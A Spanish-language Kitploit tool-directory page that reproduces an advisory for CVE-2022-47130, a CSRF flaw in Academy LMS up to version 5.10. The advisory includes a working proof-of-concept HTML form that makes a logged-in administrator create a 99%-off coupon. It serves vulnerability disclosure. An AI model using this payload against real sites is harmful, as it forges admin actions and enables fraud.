Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-47130 — Vulnerabilidad CSRF en Academy LMS <= 5.10 | Kitploit
Herramientas/GitHubGitHub/openxp-research/cve-2022-47130
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubopenxp-research/cve-2022-47130

CVE-2022-47130

Vulnerabilidad CSRF en Academy LMS <= 5.10

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-47130

Academy LMS <= 5.10 CSRF

Descripción

Academy LMS es una aplicación donde las personas pueden crear y publicitar cursos. La función de añadir cupón es vulnerable a CSRF, ya que no hay token que impida este ataque.

Prueba de Concepto (POC)

El primer paso de nuestra prueba de concepto es autenticarse en la plataforma con un usuario administrador.

Después, solo accede a la página que contiene el código para explotar la vulnerabilidad; comprueba que se ha creado un nuevo cupón automáticamente.

Código utilizado en el exploit:

root@kitploit:~
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/coupons/add" method="POST">
       <input type="hidden" name="code" value="vinix" />
       <input type="hidden" name="discount&#95;percentage" value="99" />
       <input type="hidden" name="expiry&#95;date" value="12&#47;11&#47;2022" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
Descargar herramienta